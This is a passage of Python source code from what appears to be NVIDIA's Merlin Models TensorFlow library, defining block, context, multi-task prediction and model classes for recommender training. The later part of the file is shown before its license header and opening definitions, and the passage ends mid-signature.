def build_task(self, input_shape, schema: Schema, body: Block, **kwargs):
return super().build(input_shape)
def _create_metrics(self, metrics: List[MetricOrMetricClass]) -> List[tf.keras.metrics.Metric]:
outputs = []
for metric in metrics:
if not isinstance(metric, tf.keras.metrics.Metric):
metric = metric(name=self.child_name(generic_utils.to_snake_case(metric.__name__)))
outputs.append(metric)
return outputs
@property
def task_name(self):
if self._task_name:
return self._task_name
base_name = generic_utils.to_snake_case(self.__class__.__name__)
return name_fn(self.target_name, base_name) if self.target_name else base_name
def child_name(self, name):
return name_fn(self.task_name, name)
@abc.abstractmethod
def _compute_loss(
self, predictions, targets, sample_weight=None, training: bool = False, **kwargs
) -> tf.Tensor:
raise NotImplementedError()
def compute_loss( # type: ignore
self,
predictions,
targets,
training: bool = False,
compute_metrics=True,
sample_weight: Optional[tf.Tensor] = None,
**kwargs,
) -> tf.Tensor:
if isinstance(targets, dict) and self.target_name:
targets = targets[self.target_name]
if isinstance(predictions, dict) and self.target_name and self.task_name in predictions:
predictions = predictions[self.task_name]
if self.pre:
targets = self.pre_loss(predictions, targets, training=training, **kwargs)
if isinstance(targets, tuple):
targets, predictions = targets
if isinstance(targets, tf.Tensor) and len(targets.shape) == len(predictions.shape) - 1:
predictions = tf.squeeze(predictions)
loss = self._compute_loss(
predictions, targets=targets, sample_weight=sample_weight, training=training
)
if compute_metrics:
update_ops = self.calculate_metrics(predictions, targets, forward=False, loss=loss)
update_ops = [x for x in update_ops if x is not None]
with tf.control_dependencies(update_ops):
return tf.identity(loss)
return loss
def repr_add(self):
return [("loss", self.loss)]
def calculate_metrics(self, predictions, targets, sample_weight=None, forward=True, loss=None):
if isinstance(targets, dict) and self.target_name:
targets = targets[self.target_name]
if forward:
predictions = self(predictions)
update_ops = []
for metric in self.eval_metrics:
update_ops.append(
metric.update_state(y_true=targets, y_pred=predictions, sample_weight=sample_weight)
)
for metric in self.prediction_metrics:
update_ops.append(metric.update_state(predictions, sample_weight=sample_weight))
for metric in self.label_metrics:
update_ops.append(metric.update_state(targets, sample_weight=sample_weight))
for metric in self.loss_metrics:
if not loss:
loss = self.loss(y_true=targets, y_pred=predictions, sample_weight=sample_weight)
update_ops.append(metric.update_state(loss, sample_weight=sample_weight))
return update_ops
def metric_results(self, mode: str = None):
return {metric.name: metric.result() for metric in self.metrics}
def metric_result_dict(self, mode=None):
return self.metric_results(mode=mode)
def reset_metrics(self):
for metric in self.metrics:
metric.reset()
@classmethod
def from_config(cls, config):
config = maybe_deserialize_keras_objects(
config,
{
"pre": tf.keras.layers.deserialize,
"metrics": tf.keras.metrics.deserialize,
"prediction_metrics": tf.keras.metrics.deserialize,
"label_metrics": tf.keras.metrics.deserialize,
"loss_metrics": tf.keras.metrics.deserialize,
},
)
return super().from_config(config)
def get_config(self):
config = super().get_config()
config = maybe_serialize_keras_objects(
self,
config,
["metrics", "prediction_metrics", "label_metrics", "loss_metrics", "pre"],
)
# config["summary_type"] = self.sequence_summary.summary_type
if self.target_name:
config["target_name"] = self.target_name
if self._task_name:
config["task_name"] = self._task_name
if "metrics" not in config:
config["metrics"] = []
return config
@tf.keras.utils.register_keras_serializable(package="merlin.models")
class ParallelPredictionBlock(ParallelBlock, LossMixin, MetricsMixin):
"""Multi-task prediction block.
Parameters
----------
prediction_tasks: *PredictionTask
List of tasks to be used for prediction.
task_blocks: Optional[Union[Layer, Dict[str, Layer]]]
Task blocks to be used for prediction.
task_weights : Optional[List[float]]
Weights for each task.
bias_block : Optional[Layer]
Bias block to be used for prediction.
loss_reduction : Callable
Reduction function for loss.
"""
def __init__(
self,
*prediction_tasks: PredictionTask,
task_blocks: Optional[Union[Layer, Dict[str, Layer]]] = None,
task_weights: Optional[List[float]] = None,
bias_block: Optional[Layer] = None,
loss_reduction=tf.reduce_mean,
pre: Optional[BlockType] = None,
post: Optional[BlockType] = None,
**kwargs,
):
self.loss_reduction = loss_reduction
self.prediction_tasks = prediction_tasks
self.task_weights = task_weights
self.bias_block = bias_block
self.bias_logit = tf.keras.layers.Dense(1)
self.prediction_task_dict = {}
if prediction_tasks:
for task in prediction_tasks:
self.prediction_task_dict[task.task_name] = task
super(ParallelPredictionBlock, self).__init__(self.prediction_task_dict, pre=pre, post=post)
self._task_weight_dict = defaultdict(lambda: 1.0)
if task_weights:
for task, val in zip(prediction_tasks, task_weights):
self._task_weight_dict[task.task_name] = val
self._set_task_blocks(task_blocks)
@classmethod
def get_tasks_from_schema(cls, schema, task_weight_dict=None):
task_weight_dict = task_weight_dict or {}
tasks: List[PredictionTask] = []
task_weights = []
from .prediction.classification import BinaryClassificationTask
from .prediction.regression import RegressionTask
for binary_target in schema.select_by_tag(Tags.BINARY_CLASSIFICATION).column_names:
tasks.append(BinaryClassificationTask(binary_target))
task_weights.append(task_weight_dict.get(binary_target, 1.0))
for regression_target in schema.select_by_tag(Tags.REGRESSION).column_names:
tasks.append(RegressionTask(regression_target))
task_weights.append(task_weight_dict.get(regression_target, 1.0))
# TODO: Add multi-class classification here. Figure out how to get number of classes
return task_weights, tasks
@classmethod
def from_schema( # type: ignore
cls,
schema: Schema,
task_blocks: Optional[Union[Layer, Dict[str, Layer]]] = None,
task_weight_dict: Optional[Dict[str, float]] = None,
bias_block: Optional[Layer] = None,
loss_reduction=tf.reduce_mean,
**kwargs,
) -> "ParallelPredictionBlock":
task_weight_dict = task_weight_dict or {}
task_weights, tasks = cls.get_tasks_from_schema(schema, task_weight_dict)
return cls(
*tasks,
task_blocks=task_blocks,
task_weights=task_weights,
bias_block=bias_block,
loss_reduction=loss_reduction,
**kwargs,
)
@classmethod
def task_names_from_schema(cls, schema: Schema) -> List[str]:
_, tasks = cls.get_tasks_from_schema(schema)
return [task.task_name for task in tasks]
def _set_task_blocks(self, task_blocks):
if not task_blocks:
return
if isinstance(task_blocks, dict):
tasks_multi_names = self._prediction_tasks_multi_names()
for key, task_block in task_blocks.items():
if key in tasks_multi_names:
tasks = tasks_multi_names[key]
if len(tasks) == 1:
self.prediction_task_dict[tasks[0].task_name].task_block = task_block
else:
raise ValueError(
f"Ambiguous name: {key}, can't resolve it to a task "
"because there are multiple tasks that contain the key: "
f"{", ".join([task.task_name for task in tasks])}"
)
else:
raise ValueError(
f"Couldn't find {key} in prediction_tasks, "
f"only found: {", ".join(list(self.prediction_task_dict.keys()))}"
)
elif isinstance(task_blocks, Layer):
for key, val in self.prediction_task_dict.items():
task_block = task_blocks.from_config(task_blocks.get_config())
val.task_block = task_block
else:
raise ValueError("`task_blocks` must be a Layer or a Dict[str, Layer]")
def _prediction_tasks_multi_names(self) -> Dict[str, List[PredictionTask]]:
prediction_tasks_multi_names = {
name: [val] for name, val in self.prediction_task_dict.items()
}
for name, value in self.prediction_task_dict.items():
name_parts = name.split("/")
for name_part in name_parts:
if name_part in prediction_tasks_multi_names:
prediction_tasks_multi_names[name_part].append(value)
else:
prediction_tasks_multi_names[name_part] = [value]
return prediction_tasks_multi_names
def add_task(self, task: PredictionTask, task_weight=1):
key = task.target_name
self.parallel_dict[key] = task
if task_weight:
self._task_weight_dict[key] = task_weight
return self
def pop_labels(self, inputs: Dict[Text, tf.Tensor]):
outputs = {}
for name in self.parallel_dict.keys():
outputs[name] = inputs.pop(name)
return outputs
def call(
self,
inputs: Union[TabularData, tf.Tensor],
training: bool = False,
bias_outputs=None,
**kwargs,
):
if isinstance(inputs, dict) and not all(
name in inputs for name in list(self.parallel_dict.keys())
):
if self.bias_block and not bias_outputs:
bias_outputs = self.bias_block(inputs)
inputs = self.body(inputs)
outputs = super(ParallelPredictionBlock, self).call(inputs, **kwargs)
if bias_outputs is not None:
for key in outputs:
outputs[key] += bias_outputs
return outputs
def compute_call_output_shape(self, input_shape):
if isinstance(input_shape, dict) and not all(
name in input_shape for name in list(self.parallel_dict.keys())
):
input_shape = self.body.compute_output_shape(input_shape)
return super().compute_call_output_shape(input_shape)
def compute_loss(
self, inputs: Union[tf.Tensor, TabularData], targets, training=False, **kwargs
) -> tf.Tensor:
losses = []
if isinstance(inputs, dict) and not all(
name in inputs for name in list(self.parallel_dict.keys())
):
filtered_kwargs = filter_kwargs(
dict(training=training), self, filter_positional_or_keyword=False
)
predictions = self(inputs, **filtered_kwargs)
else:
predictions = inputs
for name, task in self.prediction_task_dict.items():
loss = task.compute_loss(predictions, targets, training=training, **kwargs)
losses.append(loss * self._task_weight_dict[name])
return self.loss_reduction(losses)
def metric_results(self, mode=None):
def name_fn(x):
return "_".join([mode, x]) if mode else x
metrics = {
name_fn(name): task.metric_results() for name, task in self.prediction_task_dict.items()
}
return _output_metrics(metrics)
def metric_result_dict(self, mode=None):
results = {}
for name, task in self.prediction_task_dict.items():
results.update(task.metric_results(mode=mode))
return results
def reset_metrics(self):
for task in self.prediction_task_dict.values():
task.reset_metrics()
@property
def task_blocks(self) -> Dict[str, Optional[Layer]]:
return {name: task.task_block for name, task in self.prediction_task_dict.items()}
@property
def task_names(self) -> List[str]:
return [name for name in self.prediction_task_dict]
@property
def metrics(self) -> Dict[str, tf.keras.metrics.Metric]:
outputs = {}
for name, task in self.parallel_dict.items():
outputs.update({metric.name: metric for metric in task.metrics})
return outputs
def repr_ignore(self) -> List[str]:
return ["prediction_tasks", "parallel_layers"]
def _set_context(self, context: "BlockContext"):
for task in self.prediction_task_dict.values():
task._set_context(context)
super(ParallelPredictionBlock, self)._set_context(context)
@classmethod
def from_config(cls, config, **kwargs):
config = maybe_deserialize_keras_objects(config, ["body", "prediction_tasks"])
if "schema" in config:
config["schema"] = tensorflow_metadata_json_to_schema(config["schema"])
config["loss_reduction"] = getattr(tf, config["loss_reduction"])
prediction_tasks = config.pop("prediction_tasks", [])
return cls(*prediction_tasks, **config)
def get_config(self):
config = super().get_config()
config = maybe_serialize_keras_objects(
self, config, ["body", "loss_reduction", "prediction_tasks"]
)
if self.task_weights:
config["task_weights"] = self.task_weights
return config
@tf.keras.utils.register_keras_serializable(package="merlin_models")
class ModelBlock(Block, tf.keras.Model):
def __init__(self, block: Block, **kwargs):
super().__init__(**kwargs)
self.block = block
def call(self, inputs, **kwargs):
outputs = self.block(inputs, **kwargs)
return outputs
@property
def schema(self) -> Schema:
return self.block.schema
@classmethod
def from_config(cls, config, custom_objects=None):
block = tf.keras.utils.deserialize_keras_object(config.pop("block"))
return cls(block, **config)
def get_config(self):
return {"block": tf.keras.utils.serialize_keras_object(self.block)}
@tf.keras.utils.register_keras_serializable(package="merlin.models")
class Model(tf.keras.Model, LossMixin, MetricsMixin):
def __init__(
self,
*blocks: Union[Block, ModelLikeBlock],
context: Optional[BlockContext] = None,
**kwargs,
):
super(Model, self).__init__(**kwargs)
context = context or BlockContext()
if (
len(blocks) == 1
and isinstance(blocks[0], SequentialBlock)
and isinstance(blocks[0].layers[-1], ModelLikeBlock)
):
self.block = blocks[0]
else:
if not isinstance(blocks[-1], ModelLikeBlock):
raise ValueError("Last block must be able to calculate loss & metrics.")
self.block = SequentialBlock(blocks, context=context)
if not getattr(self.block, "_context", None):
self.block._set_context(context)
self.context = context
def call(self, inputs, **kwargs):
outputs = self.block(inputs, **kwargs)
return outputs
# @property
# def inputs(self):
# return self.block.inputs
@property
def first(self):
return self.block.layers[0]
@property
def last(self):
return self.block.layers[-1]
@property
def loss_block(self) -> ModelLikeBlock:
return self.block.last if isinstance(self.block, SequentialBlock) else self.block
@property
def schema(self) -> Schema:
return self.block.schema
def compute_loss(
self,
inputs: Union[tf.Tensor, TabularData],
targets: Union[tf.Tensor, TabularData],
compute_metrics=True,
training: bool = False,
**kwargs,
) -> tf.Tensor:
return self.loss_block.compute_loss(
inputs, targets, training=training, compute_metrics=compute_metrics, **kwargs
)
def calculate_metrics(
self,
inputs: Union[tf.Tensor, TabularData],
targets: Union[tf.Tensor, TabularData],
mode: str = "val",
forward=True,
**kwargs,
) -> Dict[str, Union[Dict[str, tf.Tensor], tf.Tensor]]:
return self.loss_block.calculate_metrics(
inputs, targets, mode=mode, forward=forward, **kwargs
)
def metric_results(self, mode=None):
return self.loss_block.metric_results(mode=mode)
def train_step(self, inputs):
"""Custom train step using the `compute_loss` method."""
with tf.GradientTape() as tape:
if isinstance(inputs, tuple):
inputs, targets = inputs
else:
targets = None
predictions = self(inputs, training=True)
loss = self.compute_loss(predictions, targets, training=True)
tf.assert_rank(
loss,
0,
"The loss tensor should have rank 0. "
"Check if you are using a tf.keras.losses.Loss with 'reduction' "
"properly set",
)
assert loss.dtype == tf.float32, (
f"The loss dtype should be tf.float32 but is rather {loss.dtype}. "
"Ensure that your model output has tf.float32 dtype, as "
"that should be the case when using mixed_float16 policy "
"to avoid numerical instabilities."
)
regularization_loss = tf.reduce_sum(self.losses)
total_loss = tf.add_n([loss, regularization_loss])
if getattr(self.optimizer, "get_scaled_loss", False):
scaled_loss = self.optimizer.get_scaled_loss(total_loss)
# If mixed precision (mixed_float16 policy) is enabled
# (and the optimizer is automatically wrapped by
# tensorflow.keras.mixed_precision.LossScaleOptimizer())
if getattr(self.optimizer, "get_scaled_loss", False):
scaled_gradients = tape.gradient(scaled_loss, self.trainable_variables)
gradients = self.optimizer.get_unscaled_gradients(scaled_gradients)
else:
gradients = tape.gradient(total_loss, self.trainable_variables)
self.optimizer.apply_gradients(zip(gradients, self.trainable_variables))
metrics = self.loss_block.metric_result_dict()
metrics["loss"] = loss
metrics["regularization_loss"] = regularization_loss
metrics["total_loss"] = total_loss
return metrics
def test_step(self, inputs):
"""Custom test step using the `compute_loss` method."""
if isinstance(inputs, tuple):
inputs, targets = inputs
else:
targets = None
predictions = self(inputs, training=False)
loss = self.compute_loss(predictions, targets, training=False)
tf.assert_rank(
loss,
0,
"The loss tensor should have rank 0. "
"Check if you are using a tf.keras.losses.Loss with 'reduction' "
"properly set",
)
# Casting regularization loss to fp16 if needed to match the main loss
regularization_loss = tf.cast(tf.reduce_sum(self.losses), loss.dtype)
total_loss = loss + regularization_loss
metrics = self.loss_block.metric_result_dict()
metrics["loss"] = loss
metrics["regularization_loss"] = regularization_loss
metrics["total_loss"] = total_loss
return metrics
def fit(
self,
x=None,
y=None,
batch_size=None,
epochs=1,
verbose="auto",
callbacks=None,
validation_split=0.0,
validation_data=None,
shuffle=True,
class_weight=None,
sample_weight=None,
initial_epoch=0,
steps_per_epoch=None,
validation_steps=None,
validation_batch_size=None,
validation_freq=1,
max_queue_size=10,
workers=1,
use_multiprocessing=False,
**kwargs,
):
# Check if merlin-dataset is passed
if hasattr(x, "to_ddf"):
if not batch_size:
raise ValueError("batch_size must be specified when using merlin-dataset.")
from .dataset import Dataset
x = Dataset(x, batch_size=batch_size, **kwargs)
return super().fit(
x,
y,
batch_size,
epochs,
verbose,
callbacks,
validation_split,
validation_data,
shuffle,
class_weight,
sample_weight,
initial_epoch,
steps_per_epoch,
validation_steps,
validation_batch_size,
validation_freq,
max_queue_size,
workers,
use_multiprocessing,
)
def batch_predict(
self, dataset: merlin.io.Dataset, batch_size: int, **kwargs
) -> merlin.io.Dataset:
"""Batched prediction using the Dask.
Parameters
----------
dataset: merlin.io.Dataset
Dataset to predict on.
batch_size: int
Batch size to use for prediction.
Returns merlin.io.Dataset
-------
"""
if hasattr(dataset, "schema"):
if not set(self.schema.column_names).issubset(set(dataset.schema.column_names)):
raise ValueError(
f"Model schema {self.schema.column_names} does not match dataset schema"
+ f" {dataset.schema.column_names}"
)
# Check if merlin-dataset is passed
if hasattr(dataset, "to_ddf"):
dataset = dataset.to_ddf()
from .prediction.batch import TFModelEncode
model_encode = TFModelEncode(self, batch_size=batch_size, **kwargs)
predictions = dataset.map_partitions(model_encode)
return merlin.io.Dataset(predictions)
@classmethod
def from_config(cls, config, custom_objects=None):
block = tf.keras.utils.deserialize_keras_object(config.pop("block"))
return cls(block, **config)
def get_config(self):
return {"block": tf.keras.utils.serialize_keras_object(self.block)}
@runtime_checkable
class RetrievalBlock(Protocol):
def query_block(self) -> Block:
...
def item_block(self) -> Block:
...
class RetrievalModel(Model):
"""Embedding-based retrieval model."""
def __init__(
self,
*blocks: Union[Block, ModelLikeBlock],
context: Optional[BlockContext] = None,
**kwargs,
):
super().__init__(*blocks, context=context, **kwargs)
if not any(isinstance(b, RetrievalBlock) for b in self.block):
raise ValueError("Model must contain a `RetrievalBlock`.")
@property
def retrieval_block(self) -> RetrievalBlock:
return next(b for b in self.blocks if isinstance(b, RetrievalBlock))
def query_embeddings(
self,
dataset: merlin.io.Dataset,
dim: int,
batch_size=None,
) -> merlin.io.Dataset:
"""Export query embeddings from the model.
Parameters
----------
dataset: merlin.io.Dataset
Dataset to export embeddings from.
dim: int
Dimensionality of the embeddings.
batch_size: int
Batch size to use for embedding extraction.
Returns
-------
merlin.io.Dataset
"""
from merlin.models.tf.prediction.batch import QueryEmbeddings
get_user_emb = QueryEmbeddings(self, dim=dim, batch_size=batch_size)
# Check if merlin-dataset is passed
if hasattr(dataset, "to_ddf"):
dataset = dataset.to_ddf()
embeddings = dataset.map_partitions(get_user_emb)
return merlin.io.Dataset(embeddings)
def item_embeddings(
self, dataset: merlin.io.Dataset, dim: int, batch_size=None, **kwargs
) -> merlin.io.Dataset:
"""Export item embeddings from the model.
Parameters
----------
dataset: merlin.io.Dataset
Dataset to export embeddings from.
dim: int
Dimensionality of the embeddings.
batch_size: int
Batch size to use for embedding extraction.
Returns
-------
merlin.io.Dataset
"""
from merlin.models.tf.prediction.batch import ItemEmbeddings
get_item_emb = ItemEmbeddings(self, dim=dim, batch_size=batch_size)
# Check if merlin-dataset is passed
if hasattr(dataset, "to_ddf"):
dataset = dataset.to_ddf()
embeddings = dataset.map_partitions(get_item_emb)
return merlin.io.Dataset(embeddings)
def is_input_block(block: Block) -> bool:
return block and getattr(block, "is_input", None)
def has_input_block(block: Block) -> bool:
if isinstance(block, SequentialBlock):
return block.inputs is not None and is_input_block(block.inputs)
return is_input_block(block.inputs)
def _output_metrics(metrics):
if len(metrics) == 1:
return metrics[list(metrics.keys())[0]]
return metrics
def right_shift_layer(self, other):
if isinstance(other, (list, Tags)):
left_side = [Filter(other)]
else:
left_side = other.layers if isinstance(other, SequentialBlock) else [other]
right_side = self.layers if isinstance(self, SequentialBlock) else [self]
return SequentialBlock(left_side + right_side)
| #
# Copyright (c) 2021, NVIDIA CORPORATION.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import abc
import copy
import sys
from collections import defaultdict
from dataclasses import dataclass
from functools import reduce
from typing import (
Dict,
List,
Optional,
Protocol,
Sequence,
Text,
Type,
Union,
overload,
runtime_checkable,
)
import six
import tensorflow as tf
from tensorflow.keras.layers import Layer
from tensorflow.python.keras.utils import generic_utils
import merlin.io
from merlin.models.config.schema import SchemaMixin
from merlin.models.utils.doc_utils import docstring_parameter
from merlin.models.utils.misc_utils import filter_kwargs
from merlin.models.utils.registry import Registry, RegistryMixin
from merlin.models.utils.schema import (
schema_to_tensorflow_metadata_json,
tensorflow_metadata_json_to_schema,
)
from merlin.schema import Schema, Tags
from .typing import TabularData, TensorOrTabularData
from .utils.mixins import LossMixin, MetricsMixin, ModelLikeBlock
from .utils.tf_utils import (
calculate_batch_size_from_input_shapes,
maybe_deserialize_keras_objects,
maybe_serialize_keras_objects,
)
block_registry: Registry = Registry.class_registry("tf.blocks")
BlockType = Union["Block", str, Sequence[str]]
@tf.keras.utils.register_keras_serializable(package="merlin.models")
class BlockContext(Layer):
"""BlockContext is part of each block.
It is used to store/retrieve public variables, and can be used to retrieve features.
This is created automatically in the model and doesn't need to be created manually.
"""
def __init__(self, **kwargs):
feature_names = kwargs.pop("feature_names", [])
feature_dtypes = kwargs.pop("feature_dtypes", {})
super(BlockContext, self).__init__(**kwargs)
self._feature_names = feature_names
self._feature_dtypes = feature_dtypes
def add_embedding_weight(self, name, **kwargs):
table = self.add_weight(name=f"{str(name)}/embedding", **kwargs)
return table
def add_features(self, *name):
self._feature_names = list({*self._feature_names, *name})
def add_variable(self, variable):
setattr(self, variable.name, variable)
def set_dtypes(self, features):
for feature_name in features:
feature = features[feature_name]
if isinstance(feature, tuple):
dtype = feature[0].dtype
else:
dtype = feature.dtype
self._feature_dtypes[feature_name] = dtype
def __getitem__(self, item):
if isinstance(item, Schema):
if len(item.column_names) > 1:
raise ValueError("Schema contains more than one column.")
item = item.column_names[0]
elif isinstance(item, Tags):
item = item.value
else:
item = str(item)
return self.named_variables[item]
def get_embedding(self, item):
if isinstance(item, Tags):
item = item.value
else:
item = str(item)
return self.named_variables[f"{item}/embedding"]
def get_mask(self):
mask_schema = self.named_variables.get("masking_schema", None)
if mask_schema is None:
raise ValueError(
"The mask schema is not stored, " "please make sure that a MaskingBlock was set"
)
return mask_schema
@property
def named_variables(self) -> Dict[str, tf.Variable]:
outputs = {}
for var in self.variables:
if var.name.endswith("/embedding:0"):
name = "/".join(var.name.split("/")[-2:])
else:
name = var.name.split("/")[-1]
outputs[name.replace(":0", "")] = var
return outputs
def _merge(self, other: "BlockContext"):
self.public_variables.update(other.public_variables)
self._feature_names = list(set(self._feature_names + other._feature_names))
def build(self, input_shape):
for feature_name in self._feature_names:
if feature_name not in self.named_variables:
shape = input_shape[feature_name]
dtype = self._feature_dtypes.get(feature_name, tf.float32)
if len(tuple(shape)) == 2:
var = tf.zeros([1, shape[-1]], dtype=dtype)
shape = tf.TensorShape([None, shape[-1]])
elif tuple(shape) != (None,):
var = tf.zeros((shape), dtype=dtype)
else:
var = tf.zeros([1], dtype=dtype)
setattr(
self,
feature_name,
tf.Variable(
var,
name=feature_name,
trainable=False,
dtype=dtype,
shape=shape,
),
)
super(BlockContext, self).build(input_shape)
def call(self, features, **kwargs):
for feature_name in self._feature_names:
self.named_variables[feature_name].assign(features[feature_name])
return features
def get_config(self):
config = super(BlockContext, self).get_config()
config["feature_names"] = self._feature_names
config["feature_dtypes"] = self._feature_dtypes
return config
class ContextMixin:
@property
def context(self) -> BlockContext:
return self._context
def _set_context(self, context: BlockContext):
if hasattr(self, "_context"):
context._merge(self._context)
self._context = context
class Block(SchemaMixin, ContextMixin, Layer):
"""Core abstraction in Merlin models."""
registry = block_registry
def __init__(self, context: Optional[BlockContext] = None, **kwargs):
super(Block, self).__init__(**kwargs)
if context:
self._set_context(context)
@classmethod
@tf.autograph.experimental.do_not_convert
def parse(cls, *block: BlockType) -> "Block":
if len(block) == 1 and isinstance(block[0], (list, tuple)):
block = block[0]
if len(block) == 1:
output: "Block" = cls.registry.parse(block[0])
else:
blocks = [cls.registry.parse(b) for b in block]
output: "Block" = blocks[0].connect(*blocks[1:])
return output
@classmethod
def from_layer(cls, layer: tf.keras.layers.Layer) -> "Block":
layer.__class__ = cls
return layer # type: ignore
@classmethod
def parse_block(cls, input: Union["Block", tf.keras.layers.Layer]) -> "Block":
if isinstance(input, Block):
return input
return cls.from_layer(input)
def build(self, input_shapes):
self._maybe_propagate_context(input_shapes)
return super().build(input_shapes)
def _maybe_build(self, inputs):
if getattr(self, "_context", None) and not self.context.built:
self.context.set_dtypes(inputs)
super()._maybe_build(inputs)
def call_targets(self, predictions, targets, training=False, **kwargs) -> tf.Tensor:
return targets
def register_features(self, feature_shapes) -> List[str]:
return []
def as_tabular(self, name=None) -> "Block":
if not name:
name = self.name
return SequentialBlock([self, AsTabular(name)], copy_layers=False)
def repeat(self, num: int = 1) -> "SequentialBlock":
"""Repeat the block num times.
Parameters
----------
num : int
Number of times to repeat the block.
"""
repeated = []
for _ in range(num):
repeated.append(self.copy())
return SequentialBlock(repeated)
def prepare(
self,
block: Optional[BlockType] = None,
post: Optional[BlockType] = None,
aggregation: Optional["TabularAggregationType"] = None,
) -> "SequentialBlock":
"""Transform the inputs of this block.
Parameters
----------
block: Optional[Block]
If set, this block will be used to transform the inputs of this block.
post: Block
Block to use as post-transformation.
aggregation: TabularAggregationType
Aggregation to apply to the inputs.
"""
block = TabularBlock(post=post, aggregation=aggregation) or block
return SequentialBlock([block, self])
def repeat_in_parallel(
self,
num: int = 1,
prefix=None,
names: Optional[List[str]] = None,
post: Optional[BlockType] = None,
aggregation: Optional["TabularAggregationType"] = None,
copies=True,
residual=False,
**kwargs,
) -> "ParallelBlock":
"""Repeat the block num times in parallel.
Parameters
----------
num: int
Number of times to repeat the block.
prefix: str
Prefix to use for the names of the blocks.
names: List[str]
Names of the blocks.
post: Block
Block to use as post-transformation.
aggregation: TabularAggregationType
Aggregation to apply to the inputs.
copies: bool
Whether to copy the block or not.
residual: bool
Whether to use a residual connection or not.
"""
repeated = {}
iterator = names if names else range(num)
if not names and prefix:
iterator = [f"{prefix}{num}" for num in iterator]
for name in iterator:
repeated[str(name)] = self.copy() if copies else self
if residual:
repeated["shortcut"] = NoOp()
return ParallelBlock(repeated, post=post, aggregation=aggregation, **kwargs)
def connect(
self,
*block: Union[tf.keras.layers.Layer, str],
block_name: Optional[str] = None,
context: Optional[BlockContext] = None,
) -> Union["SequentialBlock", "Model", "RetrievalModel"]:
"""Connect the block to other blocks sequentially.
Parameters
----------
block: Union[tf.keras.layers.Layer, str]
Blocks to connect to.
block_name: str
Name of the block.
context: Optional[BlockContext]
Context to use for the block.
"""
blocks = [self.parse(b) for b in block]
for b in blocks:
if isinstance(b, Block):
if not b.schema:
b.schema = self.schema
output = SequentialBlock(
[self, *blocks], copy_layers=False, block_name=block_name, context=context
)
if isinstance(blocks[-1], ModelLikeBlock):
if any(isinstance(b, RetrievalBlock) for b in blocks) or isinstance(
self, RetrievalBlock
):
return RetrievalModel(output)
return Model(output)
return output
def connect_with_residual(
self,
block: Union[tf.keras.layers.Layer, str],
activation=None,
) -> "SequentialBlock":
"""Connect the block to other blocks sequentially with a residual connection.
Parameters
----------
block: Union[tf.keras.layers.Layer, str]
Blocks to connect to.
activation: str
Activation to use for the residual connection.
"""
_block = self.parse(block)
residual_block = ResidualBlock(_block, activation=activation)
if isinstance(self, SequentialBlock):
self.layers.append(residual_block)
return self
return SequentialBlock([self, residual_block], copy_layers=False)
def connect_with_shortcut(
self,
block: Union[tf.keras.layers.Layer, str],
shortcut_filter: Optional["Filter"] = None,
post: Optional[BlockType] = None,
aggregation: Optional["TabularAggregationType"] = None,
block_outputs_name: Optional[str] = None,
) -> "SequentialBlock":
"""Connect the block to other blocks sequentially with a shortcut connection.
Parameters
----------
block: Union[tf.keras.layers.Layer, str]
Blocks to connect to.
shortcut_filter: Filter
Filter to use for the shortcut connection.
post: Block
Block to use as post-transformation.
aggregation: TabularAggregationType
Aggregation to apply to the outputs.
block_outputs_name: str
Name of the block outputs.
"""
_block = self.parse(block) if not isinstance(block, Block) else block
residual_block = WithShortcut(
_block,
shortcut_filter=shortcut_filter,
post=post,
aggregation=aggregation,
block_outputs_name=block_outputs_name,
)
if isinstance(self, SequentialBlock):
self.layers.append(residual_block)
return self
return SequentialBlock([self, residual_block], copy_layers=False)
def connect_debug_block(self, append=True):
"""Connect the block to a debug block.
Parameters
----------
append: bool
Whether to append the debug block to the block or to prepend it.
"""
if not append:
return SequentialBlock([Debug(), self])
return self.connect(Debug())
def connect_branch(
self,
*branches: Union["Block", "PredictionTask", str],
add_rest=False,
post: Optional[BlockType] = None,
aggregation: Optional["TabularAggregationType"] = None,
**kwargs,
) -> Union["SequentialBlock", "Model", "RetrievalModel"]:
"""Connect the block to one or multiple branches.
Parameters
----------
branches: Union[Block, PredictionTask, str]
Blocks to connect to.
add_rest: bool
Whether to add the rest of the block to the branches.
post: Block
Block to use as post-transformation.
aggregation: TabularAggregationType
Aggregation to apply to the outputs.
"""
branches = [self.parse(b) for b in branches]
all_features = []
for branch in branches:
if getattr(branch, "set_schema", None):
branch.set_schema(self.schema)
if isinstance(branch, SequentialBlock):
filter_features = branch.filter_features
if filter_features:
all_features.extend(filter_features)
if add_rest:
rest_features = self.schema.without(list(set([str(f) for f in all_features])))
rest_block = SequentialBlock([Filter(rest_features)])
branches.append(rest_block)
if all(isinstance(branch, ModelLikeBlock) for branch in branches):
parallel = ParallelPredictionBlock(
*branches, post=post, aggregation=aggregation, **kwargs
)
return Model(SequentialBlock([self, parallel]))
return SequentialBlock(
[self, ParallelBlock(*branches, post=post, aggregation=aggregation, **kwargs)]
)
def select_by_name(self, name: str) -> Optional["Block"]:
if name == self.name:
return self
return None
def copy(self):
return self.from_config(self.get_config())
def _maybe_propagate_context(self, input_shapes):
if getattr(self, "_context", None) and not self.context.built:
for module in self.submodules:
if hasattr(module, "_set_context") and not getattr(module, "context", False):
module._set_context(self.context)
if hasattr(module, "add_features_to_context") and not getattr(
module, "_features_registered", False
):
feature_names = module.add_features_to_context(input_shapes)
module._features_registered = True
if feature_names:
self.context.add_features(*feature_names)
self._need_to_call_context = True
self.context.build(input_shapes)
def __rrshift__(self, other):
return right_shift_layer(self, other)
@tf.keras.utils.register_keras_serializable(package="merlin.models")
class SequentialBlock(Block):
"""The SequentialLayer represents a sequence of Keras layers.
It is a Keras Layer that can be used instead of tf.keras.layers.Sequential,
which is actually a Keras Model. In contrast to keras Sequential, this
layer can be used as a pure Layer in tf.functions and when exporting
SavedModels, without having to pre-declare input and output shapes. In turn,
this layer is usable as a preprocessing layer for TF Agents Networks, and
can be exported via PolicySaver.
Usage::
c = SequentialLayer([layer1, layer2, layer3])
output = c(inputs) # Equivalent to: output = layer3(layer2(layer1(inputs)))
"""
def __init__(
self,
*layers,
filter: Optional[Union[Schema, Tags, List[str], "Filter"]] = None,
pre_aggregation: Optional["TabularAggregationType"] = None,
block_name: Optional[str] = None,
copy_layers: bool = False,
